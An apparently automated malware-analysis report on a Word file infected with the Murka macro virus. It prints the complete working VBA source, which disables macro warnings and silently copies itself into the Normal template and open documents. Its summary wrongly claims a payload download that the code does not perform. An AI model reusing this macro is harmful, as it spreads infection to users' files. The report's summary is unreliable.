Murka — Office (OLE) malware analysis

Static analysis result for SHA-256 77bfdda3e5c03574…

MALICIOUS

Office (OLE)

Size: 39.5 KB
Created: 2001-02-02 10:56:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: eb6f8eca85d96a8ea30b5c3667e9f2e7
SHA-1: 33109a07921d7c8a47dda7baa3e42308d1494529
SHA-256: 77bfdda3e5c035749003352505ba899d145ed7d845158426d9e3c108a21a0f39
Risk score: 80

Malware Insights

Murka · confidence 90%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Murka-1'. The embedded VBA macro, named 'macros.bas', contains comments explicitly referencing 'Murka' and appears to be designed to download and execute a second-stage payload upon document closure. The presence of VBA macros indicates a likely initial access vector via spearphishing attachment.

Heuristics (2)

  • ClamAV: Doc.Trojan.Murka-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Murka-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9164 bytes
SHA-256: 426e5ffda97b07fb51e4cbd9079cc7ca0a6c284c1697a730166e86956fe6074e

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - This is the smallest of all known macro antivirus modules!
'How it works: it loads together with the document and blocks
'              the spread of infected modules
'
'Distribution terms: Freeware (free)
'Advantages:         Correct operation, reliability!
'Disadvantages:      None found so far
'
'"All that is fine, of course, but I have no damn idea how
' to get hold of it?!" you will say angrily. You can!
'Grandpa MustDie will tell you everything!
'You only need to open the document on a personal
'computer where the Murka antivirus module is already installed.
'
'To the author: mustdie@chat.ru
'To Murka:      murka@chat.ru
'To Danilov:    antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
  s = ActiveDocument.MailMerge.MailAddressFieldName
  ' Block Ctrl+Break, switch off Word's macro virus warning and the
  ' "save changes to Normal template?" prompt so the copying below is silent
  Application.EnableCancelKey = wdCancelDisabled
  With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
  str = "Document_Close"
  ' Read this procedure's own source text from the module that contains it
  With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Murka = .Lines(i, j)
  End With
  ' If the Normal template's Document_Close differs, replace it with this
  ' code and save the template, so every later document picks the macro up
  With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      NormalTemplate.Save
    End If
  End With
  ' Do the same for the active document; about 30% of the time also stamp
  ' the summary info (Title "Murka3", Author "M&M"), then save the document
  ' in place unless it still carries an unsaved default name
  With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      Randomize
      If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
      If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Документ" Then
      Else
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
      End If
    End If
  End With
  ' Reset the document's Saved flag to the value captured above
  If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub

' Processing file: /opt/analyzer/scan_staging/9d96abaabd534310b252ea49987f1018.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5349 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #2:
' 	QuoteRem 0x0000 0x0048 "Murka - Это самый маленький из всех известных МакроАнтивирусных модулей!"
' Line #3:
' 	QuoteRem 0x0000 0x003D "Принцип действия: Загружается вместе с документом и блокирует"
' Line #4:
' 	QuoteRem 0x0000 0x0033 "                 распространение зараженных модулей"
' Line #5:
' 	QuoteRem 0x0000 0x0000 ""
' Line #6:
' 	QuoteRem 0x0000 0x002B "Условия распространения: Freeware(Свободно)"
' Line #7:
' 	QuoteRem 0x0000 0x0037 "Достоинства:             Корректная работа, надежность!"
' Line #8:
' 	QuoteRem 0x0000 0x0026 "Недостатки:              Пока не нашел"
' Line #9:
' 	QuoteRem 0x0000 0x0000 ""
' Line #10:
' 	QuoteRem 0x0000 0x003A ""Все это, конечно, хорошо, но я ни хрена не понял, как его"
' Line #11:
' 	QuoteRem 0x0000 0x0030 " можно преобрести?!" - гневно скажешь ты. Можно!"
' Line #12:
' 	QuoteRem 0x0000 0x001D "Дед MustDie вам все раскажет!"
' Line #13:
' 	QuoteRem 0x0000 0x0030 "Необходимо лишь открыть документ на персональном"
' Line #14:
' 	QuoteRem 0x0000 0x
... (truncated)